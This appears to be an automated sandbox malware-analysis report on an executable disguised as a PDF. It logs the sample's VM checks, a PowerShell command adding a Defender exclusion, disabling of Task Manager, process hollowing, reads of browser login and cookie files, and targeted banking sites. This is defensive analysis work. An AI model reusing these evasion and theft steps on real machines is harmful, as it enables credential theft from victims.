                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598734Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598625Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598407Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598282Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598157Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 598032Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597313Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeThread delayed: delay time: 594079Jump to behavior
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1312688344.0000000001247000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3762655463.0000000000D17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000000.00000002.1312688344.0000000001247000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: pre-stowage.PDF.scr.exe, 00000004.00000002.3767191739.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeMemory written: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeProcess created: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe "C:\Users\user\Desktop\pre-stowage.PDF.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Users\user\Desktop\pre-stowage.PDF.scr.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\pre-stowage.PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.pre-stowage.PDF.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4b4ed68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4ac7748.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3762230875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1320251868.0000000004894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 7128, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pre-stowage.PDF.scr.exe PID: 6896, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000004.00000002.3764112977.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.pre-stowage.PDF.scr.exe.4bd6388.1.unpack, type: UNPACKEDPE
